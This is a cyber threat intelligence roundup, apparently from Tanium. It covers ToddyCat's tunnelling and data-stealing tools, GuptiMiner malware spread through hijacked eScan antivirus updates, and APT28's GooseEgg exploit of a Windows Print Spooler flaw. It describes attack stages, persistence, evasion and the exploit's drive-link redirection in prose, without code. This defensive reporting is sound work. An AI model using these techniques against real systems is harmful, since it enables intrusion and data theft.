CTI Roundup: ToddyCat APT, GuptiMiner Malware, APT28 Exploits a Windows Print Spooler Flaw
ToddyCat deploys advanced tools for industrial scale data theft, hackers use eScan updates to spread GuptiMiner malware, and Russia’s APT28 exploits a Windows Print Spooler flaw
In this week’s roundup, CTI looks at a threat actor known as ToddyCat which has been observed leveraging simultaneous connections to victim environments to maintain persistence and steal data on an industrial scale. Next, CTI investigates a North Korean threat actor with possible ties to Kimsuky. Finally, CTI explains how Russia’s APT28 is exploiting an older Windows Print Spooler vulnerability to deploy a previously unknown hacking tool called GooseEgg.
1. ToddyCat deploys advanced tools for industrial-scale data theft
A threat actor known as ToddyCat was recently observed leveraging simultaneous connections to victim environments to maintain persistence and steal data.
The campaign makes use of several different tools, many of which are new to the ToddyCat actor. Researchers have broken down the list of tools used by the actor in this latest campaign.
ToddyCat’s traffic tunneling tools
ToddyCat had multiple tunnels to the infected infrastructure, each implemented via different tools to persist in the environment even if one tunnel is taken down. This constant access to the infrastructure enabled the actor to perform aggressive reconnaissance.
- Reverse SSH tunnel: ToddyCat was observed using a reverse SSH tunnel to access remote services.
- SoftEther VPN: ToddyCat also used the server utility from the SoftEther VPN package for tunneling. In most cases, the actor renamed the digitally signed VPN server executable to hide its purpose on the system.
- Ngrok agent and Krong: In some cases, the actor tunneled to a legitimate cloud provider to access the remote infrastructure. According to Kaspersky, Ngrok is “a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa.” Ngrok was installed on several hosts and used to redirect C2 traffic from cloud infrastructure to a specified port on these hosts. The specified port was the same port that another tool called Krong listens on. Krong is a DLL side-loaded file that is digitally signed by AVG TuneUp.
- FRP client: After establishing several tunnels via the above methods, the threat actor installed the FRP client. This client is a reverse proxy that grants access from the internet to a local server behind a NAT or firewall.
Data collection tools
ToddyCat has also been observed using various data collection tools, each serving a different purpose.
- Cuthead: A new tool that is used to search for documents. Its name was determined based on the file description field of the sample identified by SecureList. The tool is .NET-compiled and will search for files, storing them inside an archive. The tool can search for specific file extensions or specific words.
- WAExp: is a WhatsApp data stealer. It is written in .NET and aims to steal data from the web version of WhatsApp. The web versions stores data about a user including profile details, chat data, phone numbers of those chatted with, and current session data.
- TomBerBil: The actor was also observed using a tool called TomBerBil to steal passwords from browsers.
Analyst comments from Tanium’s Cyber Threat Intelligence team
ToddyCat clearly spent a lot of time thinking about the best way to persist within an environment, landing on the use of several tunnels in the event one gets discovered and cut off.
This approach, along with the use of several data collection tools, requires more maintenance and overhead. But it can prove to be rather effective, especially if new or custom tools are included in the mix.
2. Hackers use eScan updates to spread GuptiMiner malware
A North Korean threat actor with possible ties to the Kimsuky APT group was observed exploiting the updating mechanism of eScan antivirus.
The threat actor obtained an adversary-in-the-middle (AitM) position to hijack and replace the legitimate eScan update package. The attack seeks to plant backdoors and deliver cryptocurrency miners via the GuptiMiner malware.
The infection chain
This infection chain begins when eScan requests an update from the update server. When doing so, a man-in-the-middle is intercepting and downloading the update package, replacing it with a malicious one. Then eScan will unpack and load this package while a DLL is sideloaded that will enable the rest of the chain.
- Stage 0 – installation process: The actors behind this campaign performed a man-in-the-middle attack to download an infected installer to the victim’s device instead of the legitimate eScan update. At this time, there are limited details available as to how the threat actor performed the MitM stage of the attack.
- Stage 0.9 – installation improvements: The installation process has been refined over time and is significantly different now than the original. Now the threat actor is using scheduled tasks, WMI events, different next stages, disabling Windows Defender, and installing certificates to Windows.
- Stage 1 – PNG loader: A PE file executed in stage 0 will serve as a dropper in this stage and additional stages by contacting the threat actor’s malicious DNS server. An obtained response contains an encrypted URL of the real C2 server from which the malware will request an additional PNG image payload. This PNG payload contains a shellcode that provides additional functionality later on.
- Stage 2 – Gzip loader: This is the shortest stage in which the Gzip loader will decompress another shellcode via Gzip, executing it in a separate thread. This thread will load stage 3. Throughout various GuptiMiner operations, Gzip loader has not been changed.
- Stage 3 – Puppeteer: This stage is responsible for orchestrating the key functionality of the malware including the cryptocurrency mining and the deploying of backdoors. Puppeteer will monitor the system for running processes every 5 seconds, killing tools including taskmgr, Autoruns, Wireshark, Wireshark-gtp, and TCPView. The malware will check a DNS server registry key to determine if the machine is a Windows server. It will then get the number of computers joined in the domain and will try to download an additional PNG file payload.
- Stage 4 – backdoor: Two types of backdoors are deployed by GuptiMiner. The first is based on a custom build of PuTTY and has enhancements for local SMB scanning to enable lateral movement. The second backdoor is a modular backdoor that will first scan for the existence of locally stored private keys/crpyto wallets and then inject a modular backdoor in the form of shellcode.
Analyst comments from Tanium’s Cyber Threat Intelligence team
This threat actor displays a high level of sophistication, leveraging a range of stages, functions, and tools up until the final payload distribution.
The attack also ends in the distribution of XMRig, which, as Avast points out, “is a bit unexpected for such a thought-through operation,” given that it is easily detected.
The overlaps in infrastructure and TTPs with the notorious Kimsuky actor certainly increase the level of this threat.
3. APT28 exploits a Windows Print Spooler flaw
Microsoft is warning that Russian APT28 is exploiting an older Windows Print Spooler vulnerability to deploy a previously unknown hacking tool called GooseEgg.
APT28 is believed to have been using GooseEgg since at least mid-2020, and more recently to exploit CVE-2022-38028. The malware is used to spawn specific applications at the command line with elevated permissions, enabling the actor to carry out various post-compromise activities.
APT28: A refresher
APT28 — which is also tracked as Forest Blizzard by Microsoft — often leverages publicly available exploits in its attacks.
The APT has been linked to the Russian General Staff Main Intelligence Directorate (GRU) and as such carries out attacks that focus on strategic intelligence gathering. The actor’s use of GooseEgg malware is a new discovery.
How APT28 uses GooseEgg
- APT28 uses GooseEgg to obtain elevated access and steal information from the targeted system.
- The tool is used after obtaining initial access to the device.
- GooseEgg has been observed being deployed with a batch script named either execute.bat or doit.bat.
- The script will write a file containing commands to save off/compress registry hives. This file will invoke the GooseEgg executable and establish persistence via a scheduled task.
A closer look at the GooseEgg binary
The GooseEgg binary has had several names across various attacks including justice.exe and DefragmentSrv.exe.
The binary can take one of four commands that each has a different run path.
- The first command will issue a custom return code and exit.
- The next two commands will trigger the exploit and will launch a DLL or an executable with elevated privileges.
- The final command will test the exploit, confirming that it has succeeded via the whoami command.
According to Microsoft, the name of the embedded malicious DLL file often includes the phrase “wayzgoose.” The DLL is deployed within one of a few installation subdirectories under C:\ProgramData including Microsoft, Adobe, Comms, Intel, Kaspersky Lab, Bitdefender, ESET, NVIDIA, UbiSoft, and Steam.
A subdirectory with a randomly generated string is also created and will act as the install directory. An example of this created directory is: “C[:]\ProgramData\Adobe\v2.116.4405.” Registry keys are then created to register a new CLSID.
The exploit will replace the C: drive link in the object manager to point to the previously created directory. Thus, when PrintSpooler attempts to load certain components, it is redirected to the created directory.
Analyst comments from Tanium’s Cyber Threat Intelligence team
Timely patching is the best defense against APT28. The actor is known to exploit vulnerabilities rather quickly after they are publicly disclosed.
In the last few months, the actor has been seen exploiting a vulnerability in Microsoft Outlook (CVE-2023-23397) and a vulnerability in WinRAR (CVE-2023-38831), to name a few examples. The group’s ability to include public exploits in attacks is surely part of the reason the group has been able to remain active for over a decade.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum and start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.